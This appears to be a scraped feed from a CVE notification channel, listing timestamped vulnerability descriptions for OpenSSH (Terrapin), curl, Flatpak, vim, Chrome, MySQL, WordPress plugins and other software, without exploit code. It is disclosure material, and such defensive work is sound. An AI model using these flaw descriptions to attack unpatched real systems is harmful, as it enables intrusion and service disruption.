🚨 CVE-2023-48795The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust.🎖@cveNotify |
|
| 2023-12-24 16:24:32 |
🚨 CVE-2023-50569Reflected Cross Site Scripting (XSS) vulnerability in Cacti v1.2.25, allows remote attackers to escalate privileges when uploading an xml template file via templates_import.php.🎖@cveNotify |
|
| 2023-12-24 13:24:32 |
🚨 CVE-2023-46218This flaw allows a malicious HTTP server to set "super cookies" in curl thatare then passed back to more origins than what is otherwise allowed orpossible. This allows a site to set cookies that then would get sent todifferent and unrelated sites and domains.It could do this by exploiting a mixed case flaw in curl's function thatverifies a given cookie domain against the Public Suffix List (PSL). Forexample a cookie could be set with `domain=co.UK` when the URL used a lowercase hostname `curl.co.uk`, even though `co.uk` is listed as a PSL domain.🎖@cveNotify |
|
| 2023-12-24 07:24:32 |
🚨 CVE-2023-51767OpenSSH through 9.6, when common types of DRAM are used, might allow row hammer attacks (for authentication bypass) because the integer value of authenticated in mm_answer_authpassword does not resist flips of a single bit. NOTE: this is applicable to a certain threat model of attacker-victim co-location in which the attacker has user privileges.🎖@cveNotify |
|
| 2023-12-24 04:24:32 |
🚨 CVE-2023-51763csv_builder.rb in ActiveAdmin (aka Active Admin) before 3.2.0 allows CSV injection.🎖@cveNotify |
|
| 2023-12-24 03:24:32 |
🚨 CVE-2023-7024Heap buffer overflow in WebRTC in Google Chrome prior to 120.0.6099.129 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-12-23 23:24:32 |
🚨 CVE-2023-7090A flaw was found in sudo in the handling of ipa_hostname, where ipa_hostname from /etc/sssd/sssd.conf was not propagated in sudo. Therefore, it leads to privilege mismanagement vulnerability in applications, where client hosts retain privileges even after retracting them.🎖@cveNotify |
|
| 2023-12-23 21:24:32 |
🚨 CVE-2023-49594An information disclosure vulnerability exists in the challenge functionality of instipod DuoUniversalKeycloakAuthenticator 1.0.7 plugin. A specially crafted HTTP request can lead to a disclosure of sensitive information. An user login to Keycloak using DuoUniversalKeycloakAuthenticator plugin triggers this vulnerability.🎖@cveNotify |
|
| 2023-12-23 20:24:32 |
🚨 CVE-2016-15036** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in Deis Workflow Manager up to 2.3.2. It has been classified as problematic. This affects an unknown part. The manipulation leads to race condition. The complexity of an attack is rather high. The exploitability is told to be difficult. Upgrading to version 2.3.3 is able to address this issue. The patch is named 31fe3bccbdde134a185752e53380330d16053f7f. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248847. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-12-23 17:24:32 |
🚨 CVE-2014-125108A vulnerability was found in w3c online-spellchecker-py up to 20140130. It has been rated as problematic. This issue affects some unknown processing of the file spellchecker. The manipulation leads to cross site scripting. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The identifier of the patch is d6c21fd8187c5db2a50425ff80694149e75d722e. It is recommended to apply a patch to fix this issue. The identifier VDB-248849 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-23 13:24:32 |
🚨 CVE-2023-7008A vulnerability was found in systemd-resolved. This issue may allow systemd-resolved to accept records of DNSSEC-signed domains even when they have no signature, allowing man-in-the-middles (or the upstream DNS resolver) to manipulate records.🎖@cveNotify |
|
| 2023-12-23 12:24:37 |
🚨 CVE-2022-3965A vulnerability classified as problematic was found in ffmpeg. This vulnerability affects the function smc_encode_stream of the file libavcodec/smcenc.c of the component QuickTime Graphics Video Encoder. The manipulation of the argument y_size leads to out-of-bounds read. The attack can be initiated remotely. The name of the patch is 13c13109759090b7f7182480d075e13b36ed8edd. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-213544.🎖@cveNotify |
|
| 2023-12-23 12:24:34 |
🚨 CVE-2022-3964A vulnerability classified as problematic has been found in ffmpeg. This affects an unknown part of the file libavcodec/rpzaenc.c of the component QuickTime RPZA Video Encoder. The manipulation of the argument y_size leads to out-of-bounds read. It is possible to initiate the attack remotely. The name of the patch is 92f9b28ed84a77138105475beba16c146bdaf984. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-213543.🎖@cveNotify |
|
| 2023-12-23 12:24:33 |
🚨 CVE-2021-38291FFmpeg version (git commit de8e6e67e7523e48bb27ac224a0b446df05e1640) suffers from a an assertion failure at src/libavutil/mathematics.c.🎖@cveNotify |
|
| 2023-12-23 12:24:32 |
🚨 CVE-2021-33815dwa_uncompress in libavcodec/exr.c in FFmpeg 4.4 allows an out-of-bounds array access because dc_count is not strictly checked.🎖@cveNotify |
|
| 2023-12-23 11:24:32 |
🚨 CVE-2023-3515Open Redirect in GitHub repository go-gitea/gitea prior to 1.19.4.🎖@cveNotify |
|
| 2023-12-23 10:24:43 |
🚨 CVE-2023-6744The Divi theme for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'et_pb_text' shortcode in all versions up to, and including, 4.23.1 due to insufficient input sanitization and output escaping on user supplied custom field data. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-12-23 10:24:39 |
🚨 CVE-2020-36769The Widget Settings Importer/Exporter Plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wp_ajax_import_widget_dataparameter AJAX action in versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with subscriber-level permissions and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-12-23 10:24:38 |
🚨 CVE-2023-28101Flatpak is a system for building, distributing, and running sandboxed desktop applications on Linux. In versions prior to 1.10.8, 1.12.8, 1.14.4, and 1.15.4, if an attacker publishes a Flatpak app with elevated permissions, they can hide those permissions from users of the `flatpak(1)` command-line interface by setting other permissions to crafted values that contain non-printable control characters such as `ESC`. A fix is available in versions 1.10.8, 1.12.8, 1.14.4, and 1.15.4. As a workaround, use a GUI like GNOME Software rather than the command-line interface, or only install apps whose maintainers you trust.🎖@cveNotify |
|
| 2023-12-23 10:24:37 |
🚨 CVE-2023-28100Flatpak is a system for building, distributing, and running sandboxed desktop applications on Linux. Versions prior to 1.10.8, 1.12.8, 1.14.4, and 1.15.4 contain a vulnerability similar to CVE-2017-5226, but using the `TIOCLINUX` ioctl command instead of `TIOCSTI`. If a Flatpak app is run on a Linux virtual console such as `/dev/tty1`, it can copy text from the virtual console and paste it into the command buffer, from which the command might be run after the Flatpak app has exited. Ordinary graphical terminal emulators like xterm, gnome-terminal and Konsole are unaffected. This vulnerability is specific to the Linux virtual consoles `/dev/tty1`, `/dev/tty2` and so on. A patch is available in versions 1.10.8, 1.12.8, 1.14.4, and 1.15.4. As a workaround, don't run Flatpak on a Linux virtual console. Flatpak is primarily designed to be used in a Wayland or X11 graphical environment.🎖@cveNotify |
|
| 2023-12-23 10:24:33 |
🚨 CVE-2022-21682Flatpak is a Linux application sandboxing and distribution framework. A path traversal vulnerability affects versions of Flatpak prior to 1.12.3 and 1.10.6. flatpak-builder applies `finish-args` last in the build. At this point the build directory will have the full access that is specified in the manifest, so running `flatpak build` against it will gain those permissions. Normally this will not be done, so this is not problem. However, if `--mirror-screenshots-url` is specified, then flatpak-builder will launch `flatpak build --nofilesystem=host appstream-utils mirror-screenshots` after finalization, which can lead to issues even with the `--nofilesystem=host` protection. In normal use, the only issue is that these empty directories can be created wherever the user has write permissions. However, a malicious application could replace the `appstream-util` binary and potentially do something more hostile. This has been resolved in Flatpak 1.12.3 and 1.10.6 by changing the behaviour of `--nofilesystem=home` and `--nofilesystem=host`.🎖@cveNotify |
|
| 2023-12-23 10:24:32 |
🚨 CVE-2021-21381Flatpak is a system for building, distributing, and running sandboxed desktop applications on Linux. In Flatpack since version 0.9.4 and before version 1.10.2 has a vulnerability in the "file forwarding" feature which can be used by an attacker to gain access to files that would not ordinarily be allowed by the app's permissions. By putting the special tokens `@@` and/or `@@u` in the Exec field of a Flatpak app's .desktop file, a malicious app publisher can trick flatpak into behaving as though the user had chosen to open a target file with their Flatpak app, which automatically makes that file available to the Flatpak app. This is fixed in version 1.10.2. A minimal solution is the first commit "`Disallow @@ and @@U usage in desktop files`". The follow-up commits "`dir: Reserve the whole @@ prefix`" and "`dir: Refuse to export .desktop files with suspicious uses of @@ tokens`" are recommended, but not strictly required. As a workaround, avoid installing Flatpak apps from untrusted sources, or check the contents of the exported `.desktop` files in `exports/share/applications/*.desktop` (typically `~/.local/share/flatpak/exports/share/applications/*.desktop` and `/var/lib/flatpak/exports/share/applications/*.desktop`) to make sure that literal filenames do not follow `@@` or `@@u`.🎖@cveNotify |
|
| 2023-12-23 09:24:32 |
🚨 CVE-2023-5961A Cross-Site Request Forgery (CSRF) vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. An attacker can exploit this vulnerability to trick a client into making an unintentional request to the web server, which will be treated as an authentic request. This vulnerability may lead an attacker to perform operations on behalf of the victimized user.🎖@cveNotify |
|
| 2023-12-23 07:24:33 |
🚨 CVE-2023-2426Use of Out-of-range Pointer Offset in GitHub repository vim/vim prior to 9.0.1499.🎖@cveNotify |
|
| 2023-12-23 07:24:32 |
🚨 CVE-2023-1801The SMB protocol decoder in tcpdump version 4.99.3 can perform an out-of-bounds write when decoding a crafted network packet.🎖@cveNotify |
|
| 2023-12-23 05:24:32 |
🚨 CVE-2023-40660A flaw was found in OpenSC packages that allow a potential PIN bypass. When a token/card is authenticated by one process, it can perform cryptographic operations in other processes when an empty zero-length pin is passed. This issue poses a security risk, particularly for OS logon/screen unlock and for small, permanently connected tokens to computers. Additionally, the token can internally track login status. This flaw allows an attacker to gain unauthorized access, carry out malicious actions, or compromise the system without the user's awareness.🎖@cveNotify |
|
| 2023-12-23 02:24:32 |
🚨 CVE-2023-6971The Backup Migration plugin for WordPress is vulnerable to Remote File Inclusion in versions 1.0.8 to 1.3.9 via the 'content-dir' HTTP header. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code execution. NOTE: Successful exploitation of this vulnerability requires that the target server's php.ini is configured with 'allow_url_include' set to 'on'. This feature is deprecated as of PHP 7.4 and is disabled by default, but can still be explicitly enabled in later versions of PHP.🎖@cveNotify |
|
| 2023-12-23 00:24:32 |
🚨 CVE-2023-6817A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.The function nft_pipapo_walk did not skip inactive elements during set walk which could lead double deactivations of PIPAPO (Pile Packet Policies) elements, leading to use-after-free.We recommend upgrading past commit 317eb9685095678f2c9f5a8189de698c5354316a.🎖@cveNotify |
|
| 2023-12-22 23:24:32 |
🚨 CVE-2023-40422The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14. An app may be able to cause a denial-of-service.🎖@cveNotify |
|
| 2023-12-22 22:24:32 |
🚨 CVE-2023-38408The PKCS#11 feature in ssh-agent in OpenSSH before 9.3p2 has an insufficiently trustworthy search path, leading to remote code execution if an agent is forwarded to an attacker-controlled system. (Code in /usr/lib is not necessarily safe for loading into ssh-agent.) NOTE: this issue exists because of an incomplete fix for CVE-2016-10009.🎖@cveNotify |
|
| 2023-12-22 21:54:33 |
🚨 CVE-2023-38429An issue was discovered in the Linux kernel before 6.3.4. fs/ksmbd/connection.c in ksmbd has an off-by-one error in memory allocation (because of ksmbd_smb2_check_message) that may lead to out-of-bounds access.🎖@cveNotify |
|
| 2023-12-22 21:54:32 |
🚨 CVE-2017-20158** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in vova07 Yii2 FileAPI Widget up to 0.1.8. It has been declared as problematic. Affected by this vulnerability is the function run of the file actions/UploadAction.php. The manipulation of the argument file leads to cross site scripting. The attack can be launched remotely. Upgrading to version 0.1.9 is able to address this issue. The identifier of the patch is c00d1e4fc912257fca1fce66d7a163bdbb4c8222. It is recommended to upgrade the affected component. The identifier VDB-217141 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-12-22 21:24:45 |
🚨 CVE-2023-38728IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to denial of service with a specially crafted XML query statement. IBM X-Force ID: 262258.🎖@cveNotify |
|
| 2023-12-22 21:24:39 |
🚨 CVE-2023-38720IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 and 11.5 is vulnerable to denial of service with a specially crafted ALTER TABLE statement. IBM X-Force ID: 261616.🎖@cveNotify |
|
| 2023-12-22 21:24:38 |
🚨 CVE-2023-41909An issue was discovered in FRRouting FRR through 9.0. bgp_nlri_parse_flowspec in bgpd/bgp_flowspec.c processes malformed requests with no attributes, leading to a NULL pointer dereference.🎖@cveNotify |
|
| 2023-12-22 21:24:37 |
🚨 CVE-2023-38802FRRouting FRR 7.5.1 through 9.0 and Pica8 PICOS 4.3.3.2 allow a remote attacker to cause a denial of service via a crafted BGP update with a corrupted attribute 23 (Tunnel Encapsulation).🎖@cveNotify |
|
| 2023-12-22 21:24:33 |
🚨 CVE-2023-41359An issue was discovered in FRRouting FRR through 9.0. There is an out-of-bounds read in bgp_attr_aigp_valid in bgpd/bgp_attr.c because there is no check for the availability of two bytes during AIGP validation.🎖@cveNotify |
|
| 2023-12-22 21:24:32 |
🚨 CVE-2023-28464hci_conn_cleanup in net/bluetooth/hci_conn.c in the Linux kernel through 6.2.9 has a use-after-free (observed in hci_conn_hash_flush) because of calls to hci_dev_put and hci_conn_put. There is a double free that may lead to privilege escalation.🎖@cveNotify |
|
| 2023-12-22 20:54:40 |
🚨 CVE-2023-46265An unauthenticated could abuse a XXE vulnerability in the Smart Device Server to leak data or perform a Server-Side Request Forgery (SSRF).🎖@cveNotify |
|
| 2023-12-22 20:54:33 |
🚨 CVE-2023-6908A vulnerability, which was classified as problematic, was found in DFIRKuiper Kuiper 2.3.4. This affects the function unzip_file of the file kuiper/app/controllers/case_management.py of the component TAR Archive Handler. The manipulation of the argument dst_path leads to path traversal. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. Upgrading to version 2.3.5 is able to address this issue. The identifier of the patch is 94fa135153002f651f5526c55a7240e083db8d73. It is recommended to upgrade the affected component. The identifier VDB-248277 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-22 20:54:32 |
🚨 CVE-2023-27812bloofox v0.5.2 was discovered to contain an arbitrary file deletion vulnerability via the delete_file() function.🎖@cveNotify |
|
| 2023-12-22 20:24:38 |
🚨 CVE-2023-32230An improper handling of a malformed API request to an API server in Bosch BT software products can allow an unauthenticated attacker to cause a Denial of Service (DoS) situation.🎖@cveNotify |
|
| 2023-12-22 20:24:37 |
🚨 CVE-2022-41677An information disclosure vulnerability was discovered in Bosch IP camera devices allowing an unauthenticated attacker to retrieve information (like capabilities) about the device itself and network settings of the device, disclosing possibly internal network settings if the device is connected to the internet.🎖@cveNotify |
|
| 2023-12-22 20:24:33 |
🚨 CVE-2023-6483The vulnerability exists in ADiTaaS (Allied Digital Integrated Tool-as-a-Service) version 5.1 due to an improper authentication vulnerability in the ADiTaaS backend API. An unauthenticated remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to the vulnerable platform.Successful exploitation of this vulnerability could allow the attacker to gain full access to the customers’ data and completely compromise the targeted platform.🎖@cveNotify |
|
| 2023-12-22 20:24:32 |
🚨 CVE-2014-8173The pmd_none_or_trans_huge_or_clear_bad function in include/asm-generic/pgtable.h in the Linux kernel before 3.13 on NUMA systems does not properly determine whether a Page Middle Directory (PMD) entry is a transparent huge-table entry, which allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted MADV_WILLNEED madvise system call that leverages the absence of a page-table lock.🎖@cveNotify |
|
| 2023-12-22 19:54:40 |
🚨 CVE-2023-5157A vulnerability was found in MariaDB. An OpenVAS port scan on ports 3306 and 4567 allows a malicious remote client to cause a denial of service.🎖@cveNotify |
|
| 2023-12-22 19:54:33 |
🚨 CVE-2023-4260Potential off-by-one buffer overflow vulnerability in the Zephyr fuse file system.🎖@cveNotify |
|
| 2023-12-22 19:54:32 |
🚨 CVE-2007-4465Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.🎖@cveNotify |
|
| 2023-12-22 19:24:45 |
🚨 CVE-2023-5212The AI ChatBot plugin for WordPress is vulnerable to Arbitrary File Deletion in versions up to, and including, 4.8.9 as well as version 4.9.2. This makes it possible for authenticated attackers with subscriber privileges to delete arbitrary files on the server, which makes it possible to take over affected sites as well as others sharing the same hosting account. Version 4.9.1 originally addressed the issue, but it was reintroduced in 4.9.2 and fixed again in 4.9.3.🎖@cveNotify |
|
| 2023-12-22 19:24:44 |
🚨 CVE-2023-5631Roundcube before 1.4.15, 1.5.x before 1.5.5, and 1.6.x before 1.6.4 allows stored XSS via an HTML e-mail message with a crafted SVG document because of program/lib/Roundcube/rcube_washtml.php behavior. This could allow a remote attackerto load arbitrary JavaScript code.🎖@cveNotify |
|
| 2023-12-22 19:24:43 |
🚨 CVE-2023-22059Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.34 and prior and 8.1.0. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-12-22 19:24:39 |
🚨 CVE-2023-22028Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.7.43 and prior and 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-12-22 19:24:38 |
🚨 CVE-2023-4263Potential buffer overflow vulnerability in the Zephyr IEEE 802.15.4 nRF 15.4 driver🎖@cveNotify |
|
| 2023-12-22 19:24:33 |
🚨 CVE-2021-39236In Apache Ozone before 1.2.0, Authenticated users with valid Ozone S3 credentials can create specific OM requests, impersonating any other user.🎖@cveNotify |
|
| 2023-12-22 19:24:32 |
🚨 CVE-2021-39232In Apache Ozone versions prior to 1.2.0, certain admin related SCM commands can be executed by any authenticated users, not just by admins.🎖@cveNotify |
|
| 2023-12-22 18:54:38 |
🚨 CVE-2023-47741IBM i 7.3, 7.4, 7.5, IBM i Db2 Mirror for i 7.4 and 7.5 web browser clients may leave clear-text passwords in browser memory that can be viewed using common browser tools before the memory is garbage collected. A malicious actor with access to the victim's PC could exploit this vulnerability to gain access to the IBM i operating system. IBM X-Force ID: 272532.🎖@cveNotify |
|
| 2023-12-22 18:54:33 |
🚨 CVE-2023-3430A vulnerability was found in OpenImageIO, where a heap buffer overflow exists in the src/gif.imageio/gifinput.cpp file. This flaw allows a remote attacker to pass a specially crafted file to the application, which triggers a heap-based buffer overflow and could cause a crash, leading to a denial of service.🎖@cveNotify |
|
| 2023-12-22 18:54:32 |
🚨 CVE-2011-1027Off-by-one error in the convert_query_hexchar function in html.c in cgit.cgi in cgit before 0.8.3.5 allows remote attackers to cause a denial of service (infinite loop) via a string composed of a % (percent) character followed by invalid hex characters, as demonstrated by a %gg sequence.🎖@cveNotify |
|
| 2023-12-22 18:24:45 |
🚨 CVE-2023-22065Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.33 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-12-22 18:24:39 |
🚨 CVE-2023-4781Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1873.🎖@cveNotify |
|
| 2023-12-22 18:24:38 |
🚨 CVE-2023-4733Use After Free in GitHub repository vim/vim prior to 9.0.1840.🎖@cveNotify |
|
| 2023-12-22 18:24:37 |
🚨 CVE-2023-4751Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1331.🎖@cveNotify |
|
| 2023-12-22 18:24:33 |
🚨 CVE-2023-4736Untrusted Search Path in GitHub repository vim/vim prior to 9.0.1833.🎖@cveNotify |
|
| 2023-12-22 18:24:32 |
🚨 CVE-2011-1002avahi-core/socket.c in avahi-daemon in Avahi before 0.6.29 allows remote attackers to cause a denial of service (infinite loop) via an empty mDNS (1) IPv4 or (2) IPv6 UDP packet to port 5353. NOTE: this vulnerability exists because of an incorrect fix for CVE-2010-2244.🎖@cveNotify |
|
| 2023-12-22 17:54:33 |
🚨 CVE-2023-6911Multiple WSO2 products have been identified as vulnerable due to improper output encoding, a Stored Cross Site Scripting (XSS) attack can be carried out by an attacker injecting a malicious payload into the Registry feature of the Management Console.🎖@cveNotify |
|
| 2023-12-22 17:54:32 |
🚨 CVE-2023-4735Out-of-bounds Write in GitHub repository vim/vim prior to 9.0.1847.🎖@cveNotify |
|
| 2023-12-22 17:24:39 |
🚨 CVE-2023-49085Cacti provides an operational monitoring and fault management framework. In versions 1.2.25 and prior, it is possible to execute arbitrary SQL code through the `pollers.php` script. An authorized user may be able to execute arbitrary SQL code. The vulnerable component is the `pollers.php`. Impact of the vulnerability - arbitrary SQL code execution. As of time of publication, a patch does not appear to exist.🎖@cveNotify |
|
| 2023-12-22 17:24:38 |
🚨 CVE-2023-4389A flaw was found in btrfs_get_root_ref in fs/btrfs/disk-io.c in the btrfs filesystem in the Linux Kernel due to a double decrement of the reference count. This issue may allow a local attacker with user privilege to crash the system or may lead to leaked internal kernel information.🎖@cveNotify |
|
| 2023-12-22 17:24:33 |
🚨 CVE-2023-38432An issue was discovered in the Linux kernel before 6.3.10. fs/smb/server/smb2misc.c in ksmbd does not validate the relationship between the command payload size and the RFC1002 length specification, leading to an out-of-bounds read.🎖@cveNotify |
|
| 2023-12-22 17:24:32 |
🚨 CVE-2004-1287Buffer overflow in the error function in preproc.c for NASM 0.98.38 1.2 allows attackers to execute arbitrary code via a crafted asm file, a different vulnerability than CVE-2005-1194.🎖@cveNotify |
|
| 2023-12-22 16:54:40 |
🚨 CVE-2023-22078Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.34 and prior and 8.1.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-12-22 16:54:33 |
🚨 CVE-2022-27209A missing permission check in Jenkins Kubernetes Continuous Deploy Plugin 2.3.1 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-12-22 16:54:32 |
🚨 CVE-2019-13990initDocumentParser in xml/XMLSchedulingDataProcessor.java in Terracotta Quartz Scheduler through 2.3.0 allows XXE attacks via a job description.🎖@cveNotify |
|
| 2023-12-22 16:24:43 |
🚨 CVE-2022-1274A flaw was found in Keycloak in the execute-actions-email endpoint. This issue allows arbitrary HTML to be injected into emails sent to Keycloak users and can be misused to perform phishing or other attacks against users.🎖@cveNotify |
|
| 2023-12-22 16:24:39 |
🚨 CVE-2022-29052Jenkins Google Compute Engine Plugin 4.3.8 and earlier stores private keys unencrypted in cloud agent config.xml files on the Jenkins controller where they can be viewed by users with Extended Read permission, or access to the Jenkins controller file system.🎖@cveNotify |
|
| 2023-12-22 16:24:38 |
🚨 CVE-2022-28137A missing permission check in Jenkins JiraTestResultReporter Plugin 165.v817928553942 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials.🎖@cveNotify |
|
| 2023-12-22 16:24:33 |
🚨 CVE-2022-27215A missing permission check in Jenkins Release Helper Plugin 1.3.3 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials.🎖@cveNotify |
|
| 2023-12-22 16:24:32 |
🚨 CVE-2022-27213Jenkins Environment Dashboard Plugin 1.1.10 and earlier does not escape the Environment order and the Component order configuration values in its views, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with View/Configure permission.🎖@cveNotify |
|
| 2023-12-22 15:54:33 |
🚨 CVE-2023-48394Kaifa Technology WebITR is an online attendance system, its file uploading function does not restrict upload of file with dangerous type. A remote attacker with regular user privilege can exploit this vulnerability to upload arbitrary files to perform arbitrary command or disrupt service.🎖@cveNotify |
|
| 2023-12-22 15:54:32 |
🚨 CVE-2023-48392Kaifa Technology WebITR is an online attendance system, it has a vulnerability in using hard-coded encryption key. An unauthenticated remote attacker can generate valid token parameter and exploit this vulnerability to access system with arbitrary user account, including administrator’s account, to execute login account’s permissions, and obtain relevant information.🎖@cveNotify |
|
| 2023-12-22 15:24:33 |
🚨 CVE-2022-30930Tourism Management System Version: V 3.2 is affected by: Cross Site Request Forgery (CSRF).🎖@cveNotify |
|
| 2023-12-22 15:24:32 |
🚨 CVE-2021-28676An issue was discovered in Pillow before 8.2.0. For FLI data, FliDecode did not properly check that the block advance was non-zero, potentially leading to an infinite loop on load.🎖@cveNotify |
|
| 2023-12-22 14:54:32 |
🚨 CVE-2023-47787Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce WooCommerce Bookings.This issue affects WooCommerce Bookings: from n/a through 2.0.3.🎖@cveNotify |
|
| 2023-12-22 14:24:32 |
🚨 CVE-2023-51385In ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name has shell metacharacters, and this name is referenced by an expansion token in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in a user name or host name.🎖@cveNotify |
|
| 2023-12-22 13:24:51 |
🚨 CVE-2023-4078Inappropriate implementation in Extensions in Google Chrome prior to 115.0.5790.170 allowed an attacker who convinced a user to install a malicious extension to inject scripts or HTML into a privileged page via a crafted Chrome Extension. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-12-22 13:24:45 |
🚨 CVE-2023-4077Insufficient data validation in Extensions in Google Chrome prior to 115.0.5790.170 allowed an attacker who convinced a user to install a malicious extension to inject scripts or HTML into a privileged page via a crafted Chrome Extension. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-12-22 13:24:44 |
🚨 CVE-2023-4074Use after free in Blink Task Scheduling in Google Chrome prior to 115.0.5790.170 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-12-22 13:24:43 |
🚨 CVE-2023-4073Out of bounds memory access in ANGLE in Google Chrome on Mac prior to 115.0.5790.170 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-12-22 13:24:39 |
🚨 CVE-2023-4071Heap buffer overflow in Visuals in Google Chrome prior to 115.0.5790.170 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-12-22 13:24:38 |
